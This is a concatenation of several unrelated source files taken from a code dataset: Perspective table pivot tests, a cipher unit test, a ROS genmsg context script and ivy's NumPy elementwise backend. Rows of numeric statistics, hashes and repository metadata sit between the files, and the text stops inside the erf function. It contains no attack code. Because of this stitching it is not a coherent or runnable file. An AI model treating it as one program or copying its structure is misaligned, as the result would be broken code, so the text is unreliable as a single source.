'2020-03-15|a': [None,
None,
datetime(2020, 3, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-03-15|b': [None,
None,
3,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-04-15|a': [None,
None,
None,
datetime(2020, 4, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None],
'2020-04-15|b': [None,
None,
None,
4,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-05-15|a': [None,
None,
None,
None,
datetime(2020, 5, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None],
'2020-05-15|b': [None,
None,
None,
None,
5,
None,
None,
None,
None,
None,
None,
None],
'2020-06-15|a': [None,
None,
None,
None,
None,
datetime(2020, 6, 15, 0, 0),
None,
None,
None,
None,
None,
None],
'2020-06-15|b': [None,
None,
None,
None,
None,
6,
None,
None,
None,
None,
None,
None],
'2020-07-15|a': [None,
None,
None,
None,
None,
None,
datetime(2020, 7, 15, 0, 0),
None,
None,
None,
None,
None],
'2020-07-15|b': [None,
None,
None,
None,
None,
None,
7,
None,
None,
None,
None,
None],
'2020-08-15|a': [None,
None,
None,
None,
None,
None,
None,
datetime(2020, 8, 15, 0, 0),
None,
None,
None,
None],
'2020-08-15|b': [None,
None,
None,
None,
None,
None,
None,
8,
None,
None,
None,
None],
'2020-09-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 9, 15, 0, 0),
None,
None,
None],
'2020-09-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
9,
None,
None,
None],
'2020-10-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 10, 15, 0, 0),
None,
None],
'2020-10-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
10,
None,
None],
'2020-11-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 11, 15, 0, 0),
None],
'2020-11-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
11,
None],
'2020-12-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 12, 15, 0, 0)],
'2020-12-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
12]
}
def test_table_column_pivot_pandas_date_correct(self):
data = {
"a": [date(2020, i, 15) for i in range(1, 13)],
"b": [i for i in range(1, 13)]
}
table = Table(pd.DataFrame(data))
view = table.view(columns=["a", "b"], column_pivots=["a"])
assert view.to_columns() == {
'2020-01-15|a': [datetime(2020, 1, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-01-15|b': [1,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-02-15|a': [None,
datetime(2020, 2, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-02-15|b': [None,
2,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-03-15|a': [None,
None,
datetime(2020, 3, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-03-15|b': [None,
None,
3,
None,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-04-15|a': [None,
None,
None,
datetime(2020, 4, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None,
None],
'2020-04-15|b': [None,
None,
None,
4,
None,
None,
None,
None,
None,
None,
None,
None],
'2020-05-15|a': [None,
None,
None,
None,
datetime(2020, 5, 15, 0, 0),
None,
None,
None,
None,
None,
None,
None],
'2020-05-15|b': [None,
None,
None,
None,
5,
None,
None,
None,
None,
None,
None,
None],
'2020-06-15|a': [None,
None,
None,
None,
None,
datetime(2020, 6, 15, 0, 0),
None,
None,
None,
None,
None,
None],
'2020-06-15|b': [None,
None,
None,
None,
None,
6,
None,
None,
None,
None,
None,
None],
'2020-07-15|a': [None,
None,
None,
None,
None,
None,
datetime(2020, 7, 15, 0, 0),
None,
None,
None,
None,
None],
'2020-07-15|b': [None,
None,
None,
None,
None,
None,
7,
None,
None,
None,
None,
None],
'2020-08-15|a': [None,
None,
None,
None,
None,
None,
None,
datetime(2020, 8, 15, 0, 0),
None,
None,
None,
None],
'2020-08-15|b': [None,
None,
None,
None,
None,
None,
None,
8,
None,
None,
None,
None],
'2020-09-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 9, 15, 0, 0),
None,
None,
None],
'2020-09-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
9,
None,
None,
None],
'2020-10-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 10, 15, 0, 0),
None,
None],
'2020-10-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
10,
None,
None],
'2020-11-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 11, 15, 0, 0),
None],
'2020-11-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
11,
None],
'2020-12-15|a': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
datetime(2020, 12, 15, 0, 0)],
'2020-12-15|b': [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
12]
}
| 33.927632
| 114
| 0.377757
| 5,167
| 56,727
| 3.964002
| 0.03832
| 0.171858
| 0.210917
| 0.224978
| 0.926374
| 0.914364
| 0.901377
| 0.890294
| 0.882677
| 0.881213
| 0
| 0.046418
| 0.519964
| 56,727
| 1,671
| 115
| 33.947935
| 0.70574
| 0.035168
| 0
| 0.814089
| 0
| 0
| 0.040712
| 0
| 0
| 0
| 0
| 0
| 0.058097
| 1
| 0.061002
| false
| 0
| 0.00581
| 0
| 0.069717
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
bc5ed4492fbb895792dd72da4bd72b52576c1a64
| 229
|
py
|
Python
|
tests/test_cipher_yd2564.py
|
QMSS-G5072-2020/cipher_dong_yifei
|
c64fad3dc2d723f16a2568aeff68d297a490a1cf
|
[
"MIT"
] | null | null | null |
tests/test_cipher_yd2564.py
|
QMSS-G5072-2020/cipher_dong_yifei
|
c64fad3dc2d723f16a2568aeff68d297a490a1cf
|
[
"MIT"
] | null | null | null |
tests/test_cipher_yd2564.py
|
QMSS-G5072-2020/cipher_dong_yifei
|
c64fad3dc2d723f16a2568aeff68d297a490a1cf
|
[
"MIT"
] | null | null | null |
from cipher_yd2564 import __version__
from cipher_yd2564 import cipher_yd2564
def test_version():
assert __version__ == '0.1.1'
def test_negative_shift():
assert cipher_yd2564.cipher('the', -1, encrypt=True) == 'sgd'
| 20.818182
| 65
| 0.742358
| 32
| 229
| 4.84375
| 0.5
| 0.309677
| 0.206452
| 0.283871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 0.148472
| 229
| 10
| 66
| 22.9
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0.048035
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bcbfa12609e4b30a7a17158f6c3c32a85a5a89a4
| 38
|
py
|
Python
|
DL/__init__.py
|
GrayFlash/100_Days_ML_CODE
|
7c0ae04de50e7056d26019216c4f4dc8eda341d3
|
[
"Unlicense"
] | null | null | null |
DL/__init__.py
|
GrayFlash/100_Days_ML_CODE
|
7c0ae04de50e7056d26019216c4f4dc8eda341d3
|
[
"Unlicense"
] | null | null | null |
DL/__init__.py
|
GrayFlash/100_Days_ML_CODE
|
7c0ae04de50e7056d26019216c4f4dc8eda341d3
|
[
"Unlicense"
] | null | null | null |
from .L_layered_NN import L_layered_NN
| 38
| 38
| 0.894737
| 8
| 38
| 3.75
| 0.625
| 0.533333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 38
| 1
| 38
| 38
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
bcdc5d842f44cb5d53ced099e227b0563d758387
| 1,941
|
py
|
Python
|
catkin_ws/build/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/cmake/dynamixel_controllers-genmsg-context.py
|
Gabriellavoura/Cyton-Gamma-1500
|
7380000c0e4b2d71830fbc4b28c3b1ac5b750eeb
|
[
"MIT"
] | 1
|
2020-10-06T14:02:44.000Z
|
2020-10-06T14:02:44.000Z
|
catkin_ws/build/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/cmake/dynamixel_controllers-genmsg-context.py
|
Gabriellavoura/Cyton-Gamma-1500
|
7380000c0e4b2d71830fbc4b28c3b1ac5b750eeb
|
[
"MIT"
] | null | null | null |
catkin_ws/build/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/cmake/dynamixel_controllers-genmsg-context.py
|
Gabriellavoura/Cyton-Gamma-1500
|
7380000c0e4b2d71830fbc4b28c3b1ac5b750eeb
|
[
"MIT"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = ""
services_str = "/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/RestartController.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/SetComplianceMargin.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/SetCompliancePunch.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/SetComplianceSlope.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/SetSpeed.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/SetTorqueLimit.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/StartController.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/StopController.srv;/home/gabriel/Cyton_ROS/Cyton-Gamma-1500/catkin_ws/src/cyton_gamma_300-1500_operation_and_simulation/dynamixel_motor-master/dynamixel_controllers/srv/TorqueEnable.srv"
pkg_name = "dynamixel_controllers"
dependencies_str = ""
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = ""
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = 'TRUE' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 161.75
| 1,546
| 0.871716
| 280
| 1,941
| 5.692857
| 0.235714
| 0.112923
| 0.090339
| 0.107277
| 0.726474
| 0.726474
| 0.726474
| 0.726474
| 0.726474
| 0.726474
| 0
| 0.052438
| 0.017517
| 1,941
| 11
| 1,547
| 176.454545
| 0.783429
| 0.025245
| 0
| 0
| 1
| 0.111111
| 0.892593
| 0.879894
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4c161cf940fca1200c3e1073eef7490aac14a284
| 13,407
|
py
|
Python
|
ivy/functional/backends/numpy/elementwise.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | null | null | null |
ivy/functional/backends/numpy/elementwise.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | null | null | null |
ivy/functional/backends/numpy/elementwise.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | null | null | null |
# global
import numpy as np
from typing import Optional, Callable
import functools
# local
import ivy
try:
from scipy.special import erf as _erf
except (ImportError, ModuleNotFoundError):
_erf = None
# when inputs are 0 dimensional, numpy's functions return scalars
# so we use this wrapper to ensure outputs are always numpy arrays
def _handle_0_dim_output(function: Callable) -> Callable:
@functools.wraps(function)
def new_function(*args, **kwargs):
ret = function(*args, **kwargs)
return np.asarray(ret) if not isinstance(ret, np.ndarray) else ret
return new_function
@_handle_0_dim_output
def add(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if hasattr(x1, "dtype") and hasattr(x2, "dtype"):
promoted_type = np.promote_types(x1.dtype, x2.dtype)
x1, x2 = np.asarray(x1), np.asarray(x2)
x1 = x1.astype(promoted_type)
x2 = x2.astype(promoted_type)
elif not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
return np.add(np.asarray(x1), np.asarray(x2), out=out)
@_handle_0_dim_output
def pow(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if hasattr(x1, "dtype") and hasattr(x2, "dtype"):
promoted_type = np.promote_types(x1.dtype, x2.dtype)
x1, x2 = np.asarray(x1), np.asarray(x2)
x1 = x1.astype(promoted_type)
x2 = x2.astype(promoted_type)
elif not hasattr(x2, "dtype"):
x2 = np.array(x2, dtype=x1.dtype)
return np.power(x1, x2, out=out)
@_handle_0_dim_output
def bitwise_xor(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.bitwise_xor(x1, x2, out=out)
@_handle_0_dim_output
def exp(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.exp(x, out=out)
@_handle_0_dim_output
def expm1(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.expm1(x, out=out)
@_handle_0_dim_output
def bitwise_invert(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
return np.invert(x, out=out)
@_handle_0_dim_output
def bitwise_and(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if not isinstance(x2, np.ndarray):
x2 = np.asarray(x2, dtype=x1.dtype)
else:
dtype = np.promote_types(x1.dtype, x2.dtype)
x1 = x1.astype(dtype)
x2 = x2.astype(dtype)
return np.bitwise_and(x1, x2, out=out)
@_handle_0_dim_output
def equal(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.equal(x1, x2, out=out)
@_handle_0_dim_output
def greater(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.greater(x1, x2, out=out)
@_handle_0_dim_output
def greater_equal(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.greater_equal(x1, x2, out=out)
@_handle_0_dim_output
def less_equal(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
return np.less_equal(x1, x2, out=out)
@_handle_0_dim_output
def multiply(
x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
if hasattr(x1, "dtype") and hasattr(x2, "dtype"):
promoted_type = np.promote_types(x1.dtype, x2.dtype)
x1, x2 = np.asarray(x1), np.asarray(x2)
x1 = x1.astype(promoted_type)
x2 = x2.astype(promoted_type)
elif not hasattr(x2, "dtype"):
x2 = np.array(x2, dtype=x1.dtype)
return np.multiply(x1, x2, out=out)
@_handle_0_dim_output
def ceil(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
if "int" in str(x.dtype):
ret = np.copy(x)
else:
return np.ceil(x, out=out)
if ivy.exists(out):
return ivy.inplace_update(out, ret)
return ret
@_handle_0_dim_output
def floor(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
if "int" in str(x.dtype):
ret = np.copy(x)
else:
return np.floor(x, out=out)
if ivy.exists(out):
return ivy.inplace_update(out, ret)
return ret
@_handle_0_dim_output
def sign(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise indication of the sign of ``x``."""
    ret = np.sign(x, out=out)
    return ret


@_handle_0_dim_output
def sqrt(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise non-negative square root."""
    ret = np.sqrt(x, out=out)
    return ret


@_handle_0_dim_output
def isfinite(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Boolean mask of elements that are neither inf nor NaN."""
    ret = np.isfinite(x, out=out)
    return ret


@_handle_0_dim_output
def asin(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise inverse sine (maps to ``np.arcsin``)."""
    ret = np.arcsin(x, out=out)
    return ret


@_handle_0_dim_output
def isinf(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Boolean mask of positive or negative infinity."""
    ret = np.isinf(x, out=out)
    return ret


@_handle_0_dim_output
def asinh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise inverse hyperbolic sine (maps to ``np.arcsinh``)."""
    ret = np.arcsinh(x, out=out)
    return ret


@_handle_0_dim_output
def cosh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise hyperbolic cosine."""
    ret = np.cosh(x, out=out)
    return ret


@_handle_0_dim_output
def log10(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise base-10 logarithm."""
    ret = np.log10(x, out=out)
    return ret


@_handle_0_dim_output
def log(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise natural logarithm."""
    ret = np.log(x, out=out)
    return ret


@_handle_0_dim_output
def log2(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise base-2 logarithm."""
    ret = np.log2(x, out=out)
    return ret


@_handle_0_dim_output
def log1p(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise ``log(1 + x)``, accurate for small ``x``."""
    ret = np.log1p(x, out=out)
    return ret


@_handle_0_dim_output
def isnan(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Boolean mask of NaN elements."""
    ret = np.isnan(x, out=out)
    return ret


@_handle_0_dim_output
def less(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise ``x1 < x2``."""
    ret = np.less(x1, x2, out=out)
    return ret


@_handle_0_dim_output
def cos(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise cosine."""
    ret = np.cos(x, out=out)
    return ret


@_handle_0_dim_output
def logical_not(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise boolean negation."""
    ret = np.logical_not(x, out=out)
    return ret
@_handle_0_dim_output
def divide(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """True division ``x1 / x2`` with dtype promotion when both are arrays."""
    if isinstance(x1, np.ndarray):
        if isinstance(x2, np.ndarray):
            # Promote both operands to a common dtype before dividing.
            common = np.promote_types(x1.dtype, x2.dtype)
            x1, x2 = x1.astype(common), x2.astype(common)
        else:
            # Scalar divisor adopts the dividend's dtype.
            x2 = np.asarray(x2, dtype=x1.dtype)
    return np.divide(x1, x2, out=out)
@_handle_0_dim_output
def acos(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise inverse cosine (maps to ``np.arccos``)."""
    ret = np.arccos(x, out=out)
    return ret


@_handle_0_dim_output
def logical_xor(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise boolean exclusive-or."""
    ret = np.logical_xor(x1, x2, out=out)
    return ret


@_handle_0_dim_output
def logical_or(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise boolean or."""
    ret = np.logical_or(x1, x2, out=out)
    return ret


@_handle_0_dim_output
def logical_and(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise boolean and."""
    ret = np.logical_and(x1, x2, out=out)
    return ret


@_handle_0_dim_output
def acosh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise inverse hyperbolic cosine (maps to ``np.arccosh``)."""
    ret = np.arccosh(x, out=out)
    return ret


@_handle_0_dim_output
def sin(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise sine."""
    ret = np.sin(x, out=out)
    return ret


@_handle_0_dim_output
def negative(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise numerical negation ``-x``."""
    ret = np.negative(x, out=out)
    return ret


@_handle_0_dim_output
def not_equal(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise ``x1 != x2``."""
    ret = np.not_equal(x1, x2, out=out)
    return ret


@_handle_0_dim_output
def tanh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise hyperbolic tangent."""
    ret = np.tanh(x, out=out)
    return ret
@_handle_0_dim_output
def floor_divide(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise ``x1 // x2`` after promoting to a common dtype."""
    if isinstance(x2, np.ndarray):
        common = np.promote_types(x1.dtype, x2.dtype)
        x1, x2 = x1.astype(common), x2.astype(common)
    else:
        # Scalar operand adopts x1's dtype.
        x2 = np.asarray(x2, dtype=x1.dtype)
    return np.floor_divide(x1, x2, out=out)
@_handle_0_dim_output
def sinh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise hyperbolic sine."""
    ret = np.sinh(x, out=out)
    return ret


@_handle_0_dim_output
def positive(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise numerical positive ``+x`` (returns a new array)."""
    ret = np.positive(x, out=out)
    return ret


@_handle_0_dim_output
def square(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise square ``x * x``."""
    ret = np.square(x, out=out)
    return ret
@_handle_0_dim_output
def remainder(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise remainder of ``x1 / x2`` (sign follows the divisor)."""
    if isinstance(x2, np.ndarray):
        common = np.promote_types(x1.dtype, x2.dtype)
        x1, x2 = x1.astype(common), x2.astype(common)
    else:
        # Scalar operand adopts x1's dtype.
        x2 = np.asarray(x2, dtype=x1.dtype)
    return np.remainder(x1, x2, out=out)
@_handle_0_dim_output
def round(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Round to the nearest integer; integer inputs are returned as a copy."""
    if "int" not in str(x.dtype):
        return np.round(x, out=out)
    # Integers are already rounded; skip the ufunc and copy.
    ret = np.copy(x)
    if ivy.exists(out):
        return ivy.inplace_update(out, ret)
    return ret
@_handle_0_dim_output
def bitwise_or(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise bitwise or after promoting to a common dtype."""
    if isinstance(x2, np.ndarray):
        common = np.promote_types(x1.dtype, x2.dtype)
        x1, x2 = x1.astype(common), x2.astype(common)
    else:
        # Scalar operand adopts x1's dtype.
        x2 = np.asarray(x2, dtype=x1.dtype)
    return np.bitwise_or(x1, x2, out=out)
@_handle_0_dim_output
def trunc(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Truncate toward zero; integer inputs are returned as a copy."""
    if "int" not in str(x.dtype):
        return np.trunc(x, out=out)
    # Integers are already truncated; skip the ufunc and copy.
    ret = np.copy(x)
    if ivy.exists(out):
        return ivy.inplace_update(out, ret)
    return ret
@_handle_0_dim_output
def abs(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise absolute value (intentionally shadows the builtin)."""
    ret = np.absolute(x, out=out)
    return ret
@_handle_0_dim_output
def subtract(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise difference ``x1 - x2`` with dtype promotion."""
    x1_typed = hasattr(x1, "dtype")
    x2_typed = hasattr(x2, "dtype")
    if x1_typed and x2_typed:
        common = np.promote_types(x1.dtype, x2.dtype)
        x1, x2 = x1.astype(common), x2.astype(common)
    elif not x2_typed:
        # Plain Python scalar on the right: adopt x1's dtype.
        x2 = np.array(x2, dtype=x1.dtype)
    return np.subtract(x1, x2, out=out)
@_handle_0_dim_output
def logaddexp(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise ``log(exp(x1) + exp(x2))`` after dtype promotion."""
    if isinstance(x2, np.ndarray):
        common = np.promote_types(x1.dtype, x2.dtype)
        x1, x2 = x1.astype(common), x2.astype(common)
    else:
        # Scalar operand adopts x1's dtype.
        x2 = np.asarray(x2, dtype=x1.dtype)
    return np.logaddexp(x1, x2, out=out)
@_handle_0_dim_output
def bitwise_right_shift(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise ``x1 >> x2`` after promoting to a common dtype."""
    if isinstance(x2, np.ndarray):
        common = np.promote_types(x1.dtype, x2.dtype)
        x1, x2 = x1.astype(common), x2.astype(common)
    else:
        # Scalar shift amount adopts x1's dtype.
        x2 = np.asarray(x2, dtype=x1.dtype)
    return np.right_shift(x1, x2, out=out)
@_handle_0_dim_output
def bitwise_left_shift(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Element-wise ``x1 << x2`` after promoting to a common dtype."""
    if isinstance(x2, np.ndarray):
        common = np.promote_types(x1.dtype, x2.dtype)
        x1, x2 = x1.astype(common), x2.astype(common)
    else:
        # Scalar shift amount adopts x1's dtype.
        x2 = np.asarray(x2, dtype=x1.dtype)
    return np.left_shift(x1, x2, out=out)
@_handle_0_dim_output
def tan(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise tangent."""
    ret = np.tan(x, out=out)
    return ret


@_handle_0_dim_output
def atan(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise inverse tangent (maps to ``np.arctan``)."""
    ret = np.arctan(x, out=out)
    return ret


@_handle_0_dim_output
def atanh(x: np.ndarray, *, out: Optional[np.ndarray] = None) -> np.ndarray:
    """Element-wise inverse hyperbolic tangent (maps to ``np.arctanh``)."""
    ret = np.arctanh(x, out=out)
    return ret
@_handle_0_dim_output
def atan2(
    x1: np.ndarray, x2: np.ndarray, *, out: Optional[np.ndarray] = None
) -> np.ndarray:
    """Quadrant-aware inverse tangent of ``x1 / x2`` (maps to ``np.arctan2``)."""
    if isinstance(x2, np.ndarray):
        common = np.promote_types(x1.dtype, x2.dtype)
        x1, x2 = x1.astype(common), x2.astype(common)
    else:
        # Scalar operand adopts x1's dtype.
        x2 = np.asarray(x2, dtype=x1.dtype)
    return np.arctan2(x1, x2, out=out)
# Extra #
# ------#
@_handle_0_dim_output
def minimum(x1, x2, *, out: Optional[np.ndarray] = None):
    """Element-wise minimum of ``x1`` and ``x2``."""
    ret = np.minimum(x1, x2, out=out)
    return ret


@_handle_0_dim_output
def maximum(x1, x2, *, out: Optional[np.ndarray] = None):
    """Element-wise maximum of ``x1`` and ``x2``."""
    ret = np.maximum(x1, x2, out=out)
    return ret
@_handle_0_dim_output
def erf(x, *, out: Optional[np.ndarray] = None):
    """Gauss error function of ``x``, delegating to scipy's implementation.

    Raises:
        ImportError: if scipy is not installed (``_erf`` is None).
    """
    if _erf is None:
